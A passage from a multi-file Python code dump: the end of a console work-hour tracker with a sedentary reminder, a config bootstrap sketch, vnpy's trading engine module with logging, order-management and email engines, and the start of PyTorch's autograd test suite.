sedentary timer global stop_sed stop_sed = True # write back savedb() show_menu() def add_correction() : global config global timedb cor = input( "Enter mins to add: " ) tod = datetime.today().strftime("%Y-%m-%d") for i in range( len(timedb) ) : if tod == timedb[i]['date'] : timedb[i]['correction'] += int(cor) savedb() show_menu() def mark_day() : global config global timedb # find entry to modify curweek = datetime.today().strftime("%W") menu = Menu(show_stats) for i in range( len(timedb) ) : dat = date.fromisoformat( timedb[i]['date'] ) week = dat.strftime("%W") if(week == curweek) : menu.add( MenuItem( timedb[i]['date'] ) ) idx = menu.show() # get new value and write val = float( input( "Enter new value (0, 0.5, 1) : ") ) for i in range( len(timedb) ) : if menu.getstr(idx-1) == timedb[i]['date'] : timedb[i]['workday'] = val # save and show menu savedb() show_menu() def show_prev_stats() : global config global timedb menu = Menu(show_menu) menu.add( MenuItem("Prev") ) menu.add( MenuItem("Next") ) week = int( datetime.today().strftime("%W") ) - 1 while( week > 0 ) : show_stats(week) ret = menu.show() if ret == 1 : week -= 1 elif ret == 2 : week += 1 def show_menu() : show_stats() menu = Menu() menu.add( MenuItem( "Start Timer", start_timer ) ) menu.add( MenuItem( "Stop Timer", stop_timer ) ) menu.add( MenuItem( "Refresh", show_menu ) ) menu.add( MenuItem( "Time Correction", add_correction ) ) menu.add( MenuItem( "Mark holiday / half day", mark_day ) ) menu.add( MenuItem( "Show previous records", show_prev_stats ) ) while True: menu.show() def sed_timer() : init = int(config['DEFAULT']['SEDMINS']) eta = timedelta( minutes=init ) while not stop_sed : tm.sleep(1) eta -= timedelta(seconds=1) if eta.total_seconds() <= 0 : easygui.msgbox( "Time to take a walk" ) eta = timedelta( minutes=init ) def main() : th_main = threading.Thread( target=show_menu ) th_main.start() global th_sed th_sed = threading.Thread( target=sed_timer, daemon=True ) th_sed.start() th_main.join() if __name__ == "__main__": try : main() except (SystemExit, KeyboardInterrupt) as e : pass except: myassert( False, "An exception has occurred.", True )
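A bootstrap sketch of the two files main.py reads, with the keys taken from the code above (TIMEDB, DAILYEFFORT, CARRYDEFICIT, SEDMINS and the per-day entry fields); the file names and the concrete values are assumptions.

import configparser
import json

# config.ini: only the DEFAULT-section keys that main.py actually reads.
config = configparser.ConfigParser()
config['DEFAULT'] = {
    'TIMEDB': 'timedb.json',   # path of the JSON time database (assumed name)
    'DAILYEFFORT': '8.0',      # expected hours per working day
    'CARRYDEFICIT': '0.0',     # hours carried over from previous weeks
    'SEDMINS': '45',           # sedentary reminder interval in minutes
}
with open('config.ini', 'w') as f:
    config.write(f)

# One entry per day, matching the fields start_timer()/show_stats() expect:
# date ("%Y-%m-%d"), workday (0/0.5/1), timestamps with "%H:%M:%S" start/end
# pairs, and a correction in minutes.
entry = {
    "date": "2021-01-04",
    "workday": 1,
    "timestamps": [{"start": "09:00:00", "end": "12:30:00"}],
    "correction": 0,
}
with open('timedb.json', 'w') as f:
    json.dump([entry], f, indent=4)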
engine.py
""" """ import logging from logging import Logger import smtplib import os from abc import ABC from datetime import datetime from email.message import EmailMessage from queue import Empty, Queue from threading import Thread from typing import Any, Sequence, Type, Dict, List, Optional from vnpy.event import Event, EventEngine from .app import BaseApp from .event import ( EVENT_TICK, EVENT_ORDER, EVENT_TRADE, EVENT_POSITION, EVENT_ACCOUNT, EVENT_CONTRACT, EVENT_LOG ) from .gateway import BaseGateway from .object import ( CancelRequest, LogData, OrderRequest, SubscribeRequest, HistoryRequest, OrderData, BarData, TickData, TradeData, PositionData, AccountData, ContractData, Exchange ) from .setting import SETTINGS from .utility import get_folder_path, TRADER_DIR class MainEngine: """ Acts as the core of VN Trader. """ def __init__(self, event_engine: EventEngine = None): """""" if event_engine: self.event_engine: EventEngine = event_engine else: self.event_engine = EventEngine() self.event_engine.start() self.gateways: Dict[str, BaseGateway] = {} self.engines: Dict[str, BaseEngine] = {} self.apps: Dict[str, BaseApp] = {} self.exchanges: List[Exchange] = [] os.chdir(TRADER_DIR) # Change working directory self.init_engines() # Initialize function engines def add_engine(self, engine_class: Any) -> "BaseEngine": """ Add function engine. """ engine = engine_class(self, self.event_engine) self.engines[engine.engine_name] = engine return engine def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway: """ Add gateway. """ gateway = gateway_class(self.event_engine) self.gateways[gateway.gateway_name] = gateway # Add gateway supported exchanges into engine for exchange in gateway.exchanges: if exchange not in self.exchanges: self.exchanges.append(exchange) return gateway def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine": """ Add app. """ app = app_class() self.apps[app.app_name] = app engine = self.add_engine(app.engine_class) return engine def init_engines(self) -> None: """ Init all engines. """ self.add_engine(LogEngine) self.add_engine(OmsEngine) self.add_engine(EmailEngine) def write_log(self, msg: str, source: str = "") -> None: """ Put log event with specific message. """ log = LogData(msg=msg, gateway_name=source) event = Event(EVENT_LOG, log) self.event_engine.put(event) def get_gateway(self, gateway_name: str) -> BaseGateway: """ Return gateway object by name. """ gateway = self.gateways.get(gateway_name, None) if not gateway: self.write_log(f"ๆ‰พไธๅˆฐๅบ•ๅฑ‚ๆŽฅๅฃ๏ผš{gateway_name}") return gateway def get_engine(self, engine_name: str) -> "BaseEngine": """ Return engine object by name. """ engine = self.engines.get(engine_name, None) if not engine: self.write_log(f"ๆ‰พไธๅˆฐๅผ•ๆ“Ž๏ผš{engine_name}") return engine def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]: """ Get default setting dict of a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.get_default_setting() return None def get_all_gateway_names(self) -> List[str]: """ Get all names of gatewasy added in main engine. """ return list(self.gateways.keys()) def get_all_apps(self) -> List[BaseApp]: """ Get all app objects. """ return list(self.apps.values()) def get_all_exchanges(self) -> List[Exchange]: """ Get all exchanges. """ return self.exchanges def connect(self, setting: dict, gateway_name: str) -> None: """ Start connection of a specific gateway. 
""" gateway = self.get_gateway(gateway_name) if gateway: gateway.connect(setting) def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None: """ Subscribe tick data update of a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: gateway.subscribe(req) def send_order(self, req: OrderRequest, gateway_name: str) -> str: """ Send new order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.send_order(req) else: return "" def cancel_order(self, req: CancelRequest, gateway_name: str) -> None: """ Send cancel order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: gateway.cancel_order(req) def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]: """ """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.send_orders(reqs) else: return ["" for req in reqs] def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None: """ """ gateway = self.get_gateway(gateway_name) if gateway: gateway.cancel_orders(reqs) def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]: """ Send cancel order request to a specific gateway. """ gateway = self.get_gateway(gateway_name) if gateway: return gateway.query_history(req) else: return None def close(self) -> None: """ Make sure every gateway and app is closed properly before programme exit. """ # Stop event engine first to prevent new timer event. self.event_engine.stop() for engine in self.engines.values(): engine.close() for gateway in self.gateways.values(): gateway.close() class BaseEngine(ABC): """ Abstract class for implementing an function engine. """ def __init__( self, main_engine: MainEngine, event_engine: EventEngine, engine_name: str, ): """""" self.main_engine = main_engine self.event_engine = event_engine self.engine_name = engine_name def close(self): """""" pass class LogEngine(BaseEngine): """ Processes log event and output with logging module. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(LogEngine, self).__init__(main_engine, event_engine, "log") if not SETTINGS["log.active"]: return self.level: int = SETTINGS["log.level"] self.logger: Logger = logging.getLogger("VN Trader") self.logger.setLevel(self.level) self.formatter = logging.Formatter( "%(asctime)s %(levelname)s: %(message)s" ) self.add_null_handler() if SETTINGS["log.console"]: self.add_console_handler() if SETTINGS["log.file"]: self.add_file_handler() self.register_event() def add_null_handler(self) -> None: """ Add null handler for logger. """ null_handler = logging.NullHandler() self.logger.addHandler(null_handler) def add_console_handler(self) -> None: """ Add console output of log. """ console_handler = logging.StreamHandler() console_handler.setLevel(self.level) console_handler.setFormatter(self.formatter) self.logger.addHandler(console_handler) def add_file_handler(self) -> None: """ Add file output of log. """ today_date = datetime.now().strftime("%Y%m%d") filename = f"vt_{today_date}.log" log_path = get_folder_path("log") file_path = log_path.joinpath(filename) file_handler = logging.FileHandler( file_path, mode="a", encoding="utf8" ) file_handler.setLevel(self.level) file_handler.setFormatter(self.formatter) self.logger.addHandler(file_handler) def register_event(self) -> None: """""" self.event_engine.register(EVENT_LOG, self.process_log_event) def process_log_event(self, event: Event) -> None: """ Process log event. 
""" log = event.data self.logger.log(log.level, log.msg) class OmsEngine(BaseEngine): """ Provides order management system function for VN Trader. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(OmsEngine, self).__init__(main_engine, event_engine, "oms") self.ticks: Dict[str, TickData] = {} self.orders: Dict[str, OrderData] = {} self.trades: Dict[str, TradeData] = {} self.positions: Dict[str, PositionData] = {} self.accounts: Dict[str, AccountData] = {} self.contracts: Dict[str, ContractData] = {} self.active_orders: Dict[str, OrderData] = {} self.add_function() self.register_event() def add_function(self) -> None: """Add query function to main engine.""" self.main_engine.get_tick = self.get_tick self.main_engine.get_order = self.get_order self.main_engine.get_trade = self.get_trade self.main_engine.get_position = self.get_position self.main_engine.get_account = self.get_account self.main_engine.get_contract = self.get_contract self.main_engine.get_all_ticks = self.get_all_ticks self.main_engine.get_all_orders = self.get_all_orders self.main_engine.get_all_trades = self.get_all_trades self.main_engine.get_all_positions = self.get_all_positions self.main_engine.get_all_accounts = self.get_all_accounts self.main_engine.get_all_contracts = self.get_all_contracts self.main_engine.get_all_active_orders = self.get_all_active_orders def register_event(self) -> None: """""" self.event_engine.register(EVENT_TICK, self.process_tick_event) self.event_engine.register(EVENT_ORDER, self.process_order_event) self.event_engine.register(EVENT_TRADE, self.process_trade_event) self.event_engine.register(EVENT_POSITION, self.process_position_event) self.event_engine.register(EVENT_ACCOUNT, self.process_account_event) self.event_engine.register(EVENT_CONTRACT, self.process_contract_event) def process_tick_event(self, event: Event) -> None: """""" tick = event.data self.ticks[tick.vt_symbol] = tick def process_order_event(self, event: Event) -> None: """""" order = event.data self.orders[order.vt_orderid] = order # If order is active, then update data in dict. if order.is_active(): self.active_orders[order.vt_orderid] = order # Otherwise, pop inactive order from in dict elif order.vt_orderid in self.active_orders: self.active_orders.pop(order.vt_orderid) def process_trade_event(self, event: Event) -> None: """""" trade = event.data self.trades[trade.vt_tradeid] = trade def process_position_event(self, event: Event) -> None: """""" position = event.data self.positions[position.vt_positionid] = position def process_account_event(self, event: Event) -> None: """""" account = event.data self.accounts[account.vt_accountid] = account def process_contract_event(self, event: Event) -> None: """""" contract = event.data self.contracts[contract.vt_symbol] = contract def get_tick(self, vt_symbol: str) -> Optional[TickData]: """ Get latest market tick data by vt_symbol. """ return self.ticks.get(vt_symbol, None) def get_order(self, vt_orderid: str) -> Optional[OrderData]: """ Get latest order data by vt_orderid. """ return self.orders.get(vt_orderid, None) def get_trade(self, vt_tradeid: str) -> Optional[TradeData]: """ Get trade data by vt_tradeid. """ return self.trades.get(vt_tradeid, None) def get_position(self, vt_positionid: str) -> Optional[PositionData]: """ Get latest position data by vt_positionid. """ return self.positions.get(vt_positionid, None) def get_account(self, vt_accountid: str) -> Optional[AccountData]: """ Get latest account data by vt_accountid. 
""" return self.accounts.get(vt_accountid, None) def get_contract(self, vt_symbol: str) -> Optional[ContractData]: """ Get contract data by vt_symbol. """ return self.contracts.get(vt_symbol, None) def get_all_ticks(self) -> List[TickData]: """ Get all tick data. """ return list(self.ticks.values()) def get_all_orders(self) -> List[OrderData]: """ Get all order data. """ return list(self.orders.values()) def get_all_trades(self) -> List[TradeData]: """ Get all trade data. """ return list(self.trades.values()) def get_all_positions(self) -> List[PositionData]: """ Get all position data. """ return list(self.positions.values()) def get_all_accounts(self) -> List[AccountData]: """ Get all account data. """ return list(self.accounts.values()) def get_all_contracts(self) -> List[ContractData]: """ Get all contract data. """ return list(self.contracts.values()) def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]: """ Get all active orders by vt_symbol. If vt_symbol is empty, return all active orders. """ if not vt_symbol: return list(self.active_orders.values()) else: active_orders = [ order for order in self.active_orders.values() if order.vt_symbol == vt_symbol ] return active_orders class EmailEngine(BaseEngine): """ Provides email sending function for VN Trader. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(EmailEngine, self).__init__(main_engine, event_engine, "email") self.thread: Thread = Thread(target=self.run) self.queue: Queue = Queue() self.active: bool = False self.main_engine.send_email = self.send_email def send_email(self, subject: str, content: str, receiver: str = "") -> None: """""" # Start email engine when sending first email. if not self.active: self.start() # Use default receiver if not specified. if not receiver: receiver = SETTINGS["email.receiver"] msg = EmailMessage() msg["From"] = SETTINGS["email.sender"] msg["To"] = receiver msg["Subject"] = subject msg.set_content(content) self.queue.put(msg) def run(self) -> None: """""" while self.active: try: msg = self.queue.get(block=True, timeout=1) with smtplib.SMTP_SSL( SETTINGS["email.server"], SETTINGS["email.port"] ) as smtp: smtp.login( SETTINGS["email.username"], SETTINGS["email.password"] ) smtp.send_message(msg) except Empty: pass def start(self) -> None: """""" self.active = True self.thread.start() def close(self) -> None: """""" if not self.active: return self.active = False self.thread.join()
test_autograd.py
import contextlib import gc import sys import io import math import random import tempfile import time import threading import unittest import warnings from copy import deepcopy from collections import OrderedDict from itertools import product, permutations from operator import mul from functools import reduce, partial import torch from torch import nn from torch._six import inf, nan from torch.autograd.function import once_differentiable from torch.autograd.profiler import (profile, format_time, EventList, FunctionEvent, FunctionEventAvg, record_function, emit_nvtx) import torch.autograd.functional as autogradF from torch.utils.checkpoint import checkpoint from torch.testing._internal.common_cuda import TEST_CUDA from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack, suppress_warnings, slowTest, load_tests, IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck, TEST_WITH_ROCM, gradcheck, gradgradcheck, make_tensor) from torch.autograd import Variable, Function, detect_anomaly, kineto_available from torch.autograd.function import InplaceFunction import torch.autograd.forward_ad as fwAD from torch.testing import randn_like from torch.testing._internal.common_methods_invocations import (method_tests, create_input, unpack_variables, EXCLUDE_FUNCTIONAL, EXCLUDE_GRADCHECK, EXCLUDE_GRADGRADCHECK, EXCLUDE_GRADGRADCHECK_BY_TEST_NAME, exclude_tensor_method, mask_not_all_zeros, S) from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm, onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA, deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan, skipCUDAIf) _END_SENTINEL = object() def getattr_qualified(obj, qname, default=None): """ Like getattr but works with qualified names e.g. getattr(torch, 'fft.rfft') """ path = qname.split('.') for name in path: obj = getattr(obj, name, _END_SENTINEL) if obj is _END_SENTINEL: return default return obj # load_tests from common_utils is used to automatically filter tests for # sharding on sandcastle. 
This line silences flake warnings load_tests = load_tests import pickle PRECISION = 1e-4 @contextlib.contextmanager def backward_engine(engine): _prev_engine = Variable._execution_engine Variable._execution_engine = engine() try: yield finally: Variable._execution_engine = _prev_engine def graph_desc(fn): if fn is None: return 'None' result = type(fn).__name__ + '(' next_functions = fn.next_functions for next_fn, _ in next_functions: result += graph_desc(next_fn) result += ', ' if next_functions: result = result[:-2] return result + ')' class TestAutograd(TestCase): def test_tensor_grad_warnings(self): dummy = torch.empty(1) with warnings.catch_warnings(record=True) as w: # Accessing .grad on leaf dummy.requires_grad_() foo = dummy.grad self.assertEqual(len(w), 0) # Accessing .grad on non-leaf dummy = dummy.clone() foo = dummy.grad self.assertEqual(len(w), 1) # Accessing .grad on non-leaf that retains gradients dummy.retain_grad() foo = dummy.grad self.assertEqual(len(w), 1) def _function_test(self, cls): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) result = cls.apply(x, 2, y) go = torch.ones((), requires_grad=True) result.sum().backward(go, create_graph=True) self.assertEqual(x.grad, y + torch.ones(5, 5)) self.assertEqual(y.grad, x + torch.ones(5, 5) * 2) self.assertIsNotNone(x.grad.grad_fn) self.assertIsNotNone(y.grad.grad_fn) return x, y def test_function(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, pyscalar, tensor2): ctx.pyscalar = pyscalar ctx.save_for_backward(tensor1, tensor2) return tensor1 + pyscalar * tensor2 + tensor1 * tensor2 @staticmethod def backward(ctx, grad_output): var1, var2 = ctx.saved_tensors # NOTE: self is the test case here self.assertIsInstance(var1, torch.Tensor) self.assertIsInstance(var2, torch.Tensor) self.assertIsInstance(grad_output, torch.Tensor) return (grad_output + grad_output * var2, None, grad_output * ctx.pyscalar + grad_output * var1) x, y = self._function_test(MyFunction) x_grad_desc = graph_desc(x.grad.grad_fn) y_grad_desc = graph_desc(y.grad.grad_fn) self.assertExpected(x_grad_desc, "x_grad_desc") self.assertExpected(y_grad_desc, "y_grad_desc") def test_once_differentiable(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, pyscalar, tensor2): ctx.pyscalar = pyscalar ctx.save_for_backward(tensor1, tensor2) return tensor1 + pyscalar * tensor2 + tensor1 * tensor2 @staticmethod @once_differentiable def backward(ctx, grad_output): self.assertFalse(torch.is_grad_enabled()) t1, t2 = ctx.saved_tensors return (grad_output + grad_output * t2, None, grad_output * ctx.pyscalar + grad_output * t1) x, y = self._function_test(MyFunction) self.assertEqual(graph_desc(x.grad.grad_fn), 'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))') self.assertEqual(graph_desc(y.grad.grad_fn), 'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))') def test_function_returns_input(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): return grad * 2 for shape in [(1,), ()]: v = torch.ones(shape, requires_grad=True) MyFunction.apply(v).backward() self.assertEqual(v.grad, torch.full(shape, 2.)) with torch.no_grad(): v.grad.zero_() MyFunction.apply(v.clone()).backward() self.assertEqual(v.grad, torch.full(shape, 2.)) def test_function_returns_undefined_tensor(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x * 2 @staticmethod def backward(ctx, grad): return None # 
Test that undefined tensors returned from custom backward function # are propagated as undefined and not tensor full of zeroes x = torch.ones(1, requires_grad=True) MyFunction.apply(x).backward() self.assertIsNone(x.grad) MyFunction.apply(x ** 2).backward() self.assertIsNone(x.grad) MyFunction.apply(x).sum().backward() self.assertIsNone(x.grad) self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0]) def test_materialize_grads(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): self.assertEqual(grad, torch.zeros(1)) return grad x = torch.ones(1, requires_grad=True) torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward() def test_dont_materialize_grads(self): class MyFunction(Function): @staticmethod def forward(ctx, x): ctx.set_materialize_grads(False) return x @staticmethod def backward(ctx, grad): self.assertIsNone(grad) return grad x = torch.ones(1, requires_grad=True) torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward() def test_legacy_function_deprecation_exception(self): # Trigger exception class MyFunction(Function): def forward(self, x): return x def backward(self, grad_output): return grad_output # Check exception occurs with self.assertRaisesRegex( RuntimeError, 'Legacy autograd function with non-static forward method is deprecated'): MyFunction()(torch.randn(3, 4)) class SimulateBackwardError(Function): @staticmethod def forward(ctx, input): return input.clone() @staticmethod @once_differentiable def backward(ctx, input): raise Exception("Simulate error on backward pass") def test_custom_function_exception(self): t1 = torch.rand((3, 3), requires_grad=True) t2 = torch.rand((3, 3), requires_grad=True) tmp = (t1 + t2) * (t1 + t2) t3 = TestAutograd.SimulateBackwardError.apply(tmp) with self.assertRaisesRegex(Exception, "Simulate error on backward pass"): t3.sum().backward() def test_custom_function_non_tensor_inputs_outputs(self): class MyFunction(Function): @staticmethod def forward(ctx, t1, t2, scale, t3): t4 = t1 + t2 * t3 t5 = t1 * t2 + t3 t4 *= scale t5 *= scale # Save scale ctx.scale = scale ctx.save_for_backward(t1, t2, t3) return scale, t4, None, True, t5, "bar", t1 @staticmethod @once_differentiable def backward(ctx, *grads): # Verify grads self.assertEqual(7, len(grads)) self.assertIsNone(grads[0]) self.assertIsNone(grads[2]) self.assertIsNone(grads[3]) self.assertIsNone(grads[5]) scale = ctx.scale var1, var2, var3 = ctx.saved_tensors return ( grads[1] * scale + grads[4] * var2 * scale + grads[6], grads[1] * var3 * scale + grads[4] * var1 * scale, None, grads[1] * var2 * scale + grads[4] * scale, ) t1 = torch.rand(10, dtype=torch.double, requires_grad=True) t2 = torch.rand(10, dtype=torch.double, requires_grad=True) t3 = torch.rand(10, dtype=torch.double) scale = random.randint(0, 10) res = MyFunction.apply(t1, t2, scale, t3) self.assertEqual(scale, res[0]) self.assertEqual((t1 + t2 * t3) * scale, res[1]) self.assertEqual(None, res[2]) self.assertEqual(True, res[3]) self.assertEqual((t1 * t2 + t3) * scale, res[4]) self.assertEqual("bar", res[5]) self.assertEqual(t1, res[6]) # Validate running backward. 
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()]) self.assertIsNotNone(t1.grad) self.assertIsNotNone(t2.grad) self.assertIsNone(t3.grad) # Test gradcheck def foo(t1, t2, t3): res = MyFunction.apply(t1, t2, scale, t3) return res[1], res[4], res[6] gradcheck(foo, (t1, t2, t3)) def test_custom_function_no_tensors(self): class MyFunction(Function): @staticmethod def forward(ctx, t1, t2, scale, t3): t4 = t1 + t2 * t3 t5 = t1 * t2 + t3 t4 *= scale t5 *= scale return scale, t4, None, True, t5, "bar", t1 @staticmethod @once_differentiable def backward(ctx, *args): return (args[0], args[1], None, args[2]) t1 = random.random() t2 = random.random() t3 = random.random() scale = random.randint(0, 10) res = MyFunction.apply(t1, t2, scale, t3) self.assertEqual(scale, res[0]) self.assertEqual((t1 + t2 * t3) * scale, res[1]) self.assertEqual(None, res[2]) self.assertEqual(True, res[3]) self.assertEqual((t1 * t2 + t3) * scale, res[4]) self.assertEqual("bar", res[5]) self.assertEqual(t1, res[6]) def test_invalid_gradients(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x * 2 @staticmethod def backward(ctx, grad_output): return torch.randn(10, dtype=torch.float) with self.assertRaisesRegex(RuntimeError, 'expected shape'): input = torch.randn(5, 5, dtype=torch.float, requires_grad=True) MyFunction.apply(input).sum().backward() def test_accumulate_grad(self): grad_output = torch.ones(5, 5) def compute_grad(create_graph): x = torch.randn(5, 5, requires_grad=True) y = x + 2 y.backward(grad_output, retain_graph=True) x_grad = x.grad x_grad_clone = x.grad.clone() y.backward(grad_output, create_graph=create_graph) return x_grad, x_grad_clone # Accumulate in-place when create_graph is False x_grad, x_grad_clone = compute_grad(create_graph=False) self.assertEqual(x_grad, x_grad_clone * 2) # Accumulate out-of-place when create_graph is False x_grad, x_grad_clone = compute_grad(create_graph=True) self.assertEqual(x_grad, x_grad_clone) def test_accumulate_grad_tensor_reference(self): def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph): params = torch.tensor([1.5, 1.5]).requires_grad_() params.grad = params_grad_tensor grad_saved = params.grad params.backward(backward_grad_tensor, create_graph=create_graph) self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference) for create_graph in (False, True): # Accumulate dense gradient to sparse gradient will change the `params.grad` reference _test_grad_tensor( torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), torch.tensor([1.5, 1.5]), False, # never accumulates in-place create_graph) # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference, # but only if create_graph=False. _test_grad_tensor( torch.tensor([1.5, 1.5]), torch.tensor([1.5, 1.5]), not create_graph, create_graph) # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference, # but only if create_graph=False. 
_test_grad_tensor( torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), not create_graph, create_graph) @skipIfNoLapack def test_slogdet_sign(self): a = torch.randn(3, 3, dtype=torch.double, requires_grad=True) s, logdet = a.slogdet() # test that sign should not require grad self.assertFalse(s.requires_grad) # test that backward through computation involving sign works def sign_mul_logdet(mat): s, logdet = mat.slogdet() return s * logdet u, s, v = a.detach().svd() s.abs_().clamp_(0.0001) for sign in (-1, 1): s[-1] = sign mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_() gradcheck(sign_mul_logdet, mat) gradgradcheck(sign_mul_logdet, mat) def test_sum_to_with_empty_dim_grad(self): a = torch.rand(4, 0, requires_grad=True) b = torch.rand(4, 1, requires_grad=True) c = a + b assert c.shape == (4, 0) c.sum().backward() self.assertEqual(b.grad, torch.zeros(4, 1)) self.assertEqual(a.grad, torch.zeros(4, 0)) def test_hessian_vector(self): x = torch.randn(2, 2, requires_grad=True) y = torch.randn(2, 2, requires_grad=True) z = x ** 2 + y * x + y ** 2 z.backward(torch.ones(2, 2), create_graph=True) with torch.no_grad(): x_grad = 2 * x + y y_grad = x + 2 * y self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) grad_sum = 2 * x.grad + y.grad grad_sum.backward(torch.ones(2, 2)) x_hv = torch.ones(2, 2) * 5 y_hv = torch.ones(2, 2) * 4 self.assertEqual(x.grad, x_grad + x_hv) self.assertEqual(y.grad, y_grad + y_hv) def test_grad(self): x = torch.randn(2, 2, requires_grad=True) y = torch.randn(2, 2, requires_grad=True) z = x ** 2 + y * x + y ** 2 z.backward(torch.ones(2, 2), create_graph=True) x_grad = 2 * x + y y_grad = x + 2 * y self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) grad_sum = 2 * x.grad + y.grad x_hv = torch.autograd.grad( outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)], inputs=[x], create_graph=True) expected_x_hv = torch.ones(2, 2) * 5 expected_y_hv = torch.ones(2, 2) * 4 self.assertEqual(x_hv[0], expected_x_hv) self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) # Test that grad_outputs and outputs have the same shape grad_out = torch.ones(2) try: torch.autograd.grad( outputs=[grad_sum], grad_outputs=[grad_out], inputs=[x], create_graph=True) self.assertFail() except RuntimeError as error: self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of " + str(grad_out.shape) + " and output[0] has a shape of " + str(grad_sum.shape) + ".") def test_grad_nonleaf(self): x_init = torch.randn(2, 2, requires_grad=True) x = x_init y = torch.randn(2, 2, requires_grad=True) grad_output = torch.ones(2, 2) def fn(x): return x ** 2 + y * x + y ** 2 for _ in range(5): grad_x, = torch.autograd.grad( fn(x), x, grad_outputs=grad_output, create_graph=True) grad_x_expected = 2 * x + y self.assertIsNone(y.grad) self.assertIsNone(x.grad) self.assertEqual(grad_x, grad_x_expected) x = x + 0.05 * grad_x val_init = fn(x_init).sum() val_final = fn(x).sum() self.assertGreater(val_final, val_init) x.backward(grad_output) self.assertIsNotNone(y.grad) self.assertIsNotNone(x_init.grad) def test_grad_nonleaf_many_outputs(self): # This checks an edge case for function callbacks # We want to capture two grads of a function, but can only # register a single callback. 
x = torch.randn(4, 2, requires_grad=True) a, b = x.chunk(2) def hook(*grads): hook_called[0] = True hook_called = [False] x.register_hook(hook) go = torch.randn(2, 2) grad_a, grad_b = torch.autograd.grad( (a + 2 * b), [a, b], grad_outputs=go, create_graph=True) self.assertEqual(grad_a, go) self.assertEqual(grad_b, go * 2) self.assertFalse(hook_called[0]) self.assertIsNone(x.grad) def test_grad_nonleaf_register_hook(self): # This checks an edge case for register_hook. # We want to capture grad of a nonleaf tensor, # but avoid segfault during backward of other nonleaf tensors x = torch.randn(5, requires_grad=True) x_list = x.unbind() x0 = x_list[0] hook_results = [None] def hook(grad): hook_results[0] = grad x0.register_hook(hook) x_list[0].backward() self.assertEqual(hook_results[0], torch.tensor(1.)) expected_grad = torch.tensor([1., 0, 0, 0, 0]) self.assertEqual(x.grad, expected_grad) self.assertIsNone(x_list[0].grad) for i in range(1, 5, 1): x_list[i].backward() self.assertEqual(hook_results[0], None) expected_grad[i] = 1.0 self.assertEqual(x.grad, expected_grad) self.assertIsNone(x_list[i].grad) def test_hook_with_no_name(self): # Create a hook that do not have a __name__ attribute class MyHookClass: def __call__(self, grad): return grad.clone() x = torch.randn(5, requires_grad=True).clone() x.register_hook(MyHookClass()) x.sum().backward() # Should run fine def test_sharded_grad(self): leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)] intermediates = [l * i + l * l for i, l in enumerate(leaves)] loss = sum(v * i for i, v in enumerate(intermediates)).sum() # define a helper for dividing intermediates into groups def group(l, group_size): return (l[i:i + group_size] for i in range(0, len(l), group_size)) # Compute the d loss / d intermediates in chunks of shard_size shard_size = 2 d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size) for d_i in torch.autograd.grad(loss, intermediates_batch)] # Compute rest of backward pass torch.autograd.backward(intermediates, d_intermediates) for i, l in enumerate(leaves): self.assertEqual(l.grad, i * i * (1 + l)) def test_backward_badcalls(self): x = torch.ones(1) with self.assertRaisesRegex(RuntimeError, 'does not require grad'): x.backward() def test_grad_badcalls(self): x = torch.ones(1) y = x ** 2 with self.assertRaisesRegex(RuntimeError, 'does not require grad'): torch.autograd.grad(x, y) with self.assertRaisesRegex(RuntimeError, 'does not require grad'): torch.autograd.grad(y, x) x = torch.ones(1, requires_grad=True) y = x ** 2 torch.autograd.grad(y, x) # this should succeed now def test_grad_fn_badcalls(self): error_regex = 'expected .* arguments, got .* instead' x = torch.ones(1, requires_grad=True) y = x ** 2 with 